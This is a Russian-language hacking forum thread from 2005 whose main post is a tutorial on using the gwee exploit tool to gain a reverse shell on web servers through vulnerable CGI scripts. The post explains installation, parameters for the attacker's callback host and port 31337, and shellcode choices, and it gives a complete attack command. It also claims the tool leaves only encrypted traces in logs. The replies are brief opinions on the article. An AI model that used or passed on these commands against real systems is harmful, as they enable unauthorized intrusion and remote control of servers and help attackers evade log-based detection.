Статьи ..::!! Все о Gwee !!::.. (c) SVT

Discussion in 'Статьи' started by tester2005, 19 Jul 2005.

  1. tester2005

    tester2005 Elder - Старейшина

    Joined:
    17 Jan 2005
    Messages:
    38
    Likes Received:
    2
    Reputations:
    0
    /=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
    ..::!! Все о Gwee !!::..

    \==: INTRO :===================================================================/

    Gwee - это эксплоит который служит для получения шелл доступа к уязвимому сайту.
    Допустим вы нашли бажный CGI скрипт, пользуетесь веб-шеллом, и все бы ничего.
    Тока вот этого мало для вас, что тогда делать? Ответ простой, вы качаете gwee,
    устанавливаете и получаете не веб-шелл, а вполне хороший шелл доступ, конечно
    же права ваши будут не root (при первом посещении =), но все таки это уже
    консоль и работать там куда приятнее.

    Наверно самым сложным в обращении с gwee, является умение задать правильные
    команды. Именно от того какие параметры вы установите и будет зависеть успех
    вашей операции =)(подробнее о параметрах читай ниже). Чем еще замечателен gwee,
    так это тем, что он является универсальным. Универсальность в том, что он
    может получить шелл на многих машинах под разными ОС. Дело в том, что
    при использовании его вы определяете какой шелл-код будет пересылаться
    на уязвимую машину. В gwee доступны следующие типы шелл-кодов:
    +-------------------------+
    | Sabu's Perl shellcode |
    | Linux x86 binary |
    | FreeBSD x86 binary |
    | NetBSD x86 binary |
    | Sabu's Python shellcode.|
    +-------------------------+
    Видим, что набор хорош. Благодаря этому набору, возможно получить шелл
    практически на любом серваке (главное найти уязвимый скрипт =).

    Еще хотелось бы отметить, что пересылка шеллкода происходит методом GET и POST.
    По умолчанию пересылка ведется методом POST, но почему-то не всегда работает.
    Поэтому я советую определять опцию пересылки =).

    Теперь поговорим о защите самого себя при использовании gwee. В логах сплоит
    следит очень хорошо, НО он делает это «красиво», т.е. он оставляет следы в
    зашифрованном виде и понять, что происходило на машине не возможно. Так
    что он безопасный, использование его не должно привести к каким то плохим
    последствиям ;)

    Установить gwee не просто, а очень просто. Вот последовательность команд:
    +-----------------------------------+
    | wget (или любая другая качалка) |
    | cd |
    | make unix (команда установки gwee)|
    +-----------------------------------+
    и все! Больше ненужно ничего лишнего. Я же говорил, что очень просто.

    ==: Parametrs:==================================================================

    Теперь поговорим о параметрах применяемые в gwee. Я не буду рассказывать обо
    всех параметрах, расскажу только о самых нужных на первый раз. Поехали!

    -h
    Это наверно стандартный параметр в любой программе =)). Короче это помощь =)

    -y
    Начальный параметр, указывается перед частью ссылки до эксплуатации
    gwee -y'?cmd='

    -z
    Часть ссылки на уязвимый скрипт и его параметры после выполнения команд
    gwee -y'?cmd=' -z'|' target/cgi-bin/test.cgi

    -G
    Этот параметр определяет способ пересылки шелкода, о котором мы говорили выше.
    Как и выше я говорю, что лучше указать этот параметр. Т.е. если вы его укажите,
    то персылка ведется методом GET иначе POST.

    -l
    Этот параметр нужен для того что бы соединится к вашему хосту. Указывается либо
    название вашего хоста с которого происходит соединение, либо ip адрес вашего
    хоста.
    gwee -y'?cmd=' -z'|' -l test.com target/cgi-bin/test.cgi

    -p
    Определяет порт содинения, по умолчанию стоит 31337

    -s
    0 = Sabu's Perl shellcode (default if -s is omitted)
    1 = Linux x86 binary
    2 = FreeBSD x86 binary
    3 = NetBSD x86 binary
    4 = Sabu's Python shellcode (the target must have Python installed)
    Этот параметр определяет какой тип шелл-кода будет пересылаться

    -i
    0 = perl -e "print \"<hex>\"" (default if -i is omitted)
    1 = python -c "__import__(\"sys\").stdout.write(\"<hex>\")"
    2 = printf "<hex>"
    3 = echo -ne "<hex>" (works only if target's /bin/sh is bash)
    Каким методом будет получен шелл доступ

    ==: Examples :==================================================================

    Думаю на первый раз параметров хватит. Ну а теперь немного о примерах, что бы
    было более понятно, что такое gwee.
    +--------------------------------------------------------------------------------+
    | ./gwee -y'?file=|' -z'|'-l test.com -p 31337 -s1 -i3 -G http://example/vuln.pl |
    +--------------------------------------------------------------------------------+
    Видим, что я определяю опцию G что бы пересылка шелл-кода шла методом GET. А так
    же все стандартные опции, которое описывал выше. Этот пример давольно простой,
    но он наглядно показывает как нужно правельно определять опции.
    ================================================================================
    Я описал только азы работы с gwee, но этого достаточно для успешной эксплуатации
    Больше опций вы можете посмотреть в самой программе. Если будут какие вопросы по
    поводу этой статьи или по поводу самого gwee, то пишите ([email protected]) или
    стучите в аську ( 944408 ). Постораюсь помочь.

    Скачать gwee можно с нашего сайта: http://svt.nukleon.us/toos/gwee-1.36.tar.gz
    И официального сайта сплоита gwee: http://tigerteam.se/dl/gwee/
    ================================================================================
    Search Vulnerabilities Team - www.svt.nukleon.us - 27.06.05 автор CENSORED
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
     
  2. kot777

    kot777 O-la-la!

    Joined:
    13 Aug 2004
    Messages:
    588
    Likes Received:
    435
    Reputations:
    454
    Средняя статья =)
    Не, это я серьёзно. Просто зачем нужен qwee, если можно через back-connect получить нормальный шелл.
     
  3. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    кот777 ты не понял=) гвии это эксплойт с помощью которого ты получаешь консоль))откуда ты взял что в системе уже есть веб-шелл?

    ПЫ.СЫ. люди есть же видео...
    ПЫЫ.СЫЫ. мне статья чтото не понравилась..
     
  4. k00p3r

    k00p3r Banned

    Joined:
    31 May 2005
    Messages:
    430
    Likes Received:
    8
    Reputations:
    2
    Я видел видео.Ну я назхвал статьюхорошей, т.к. больше нигде не видел статей об этом сплоите.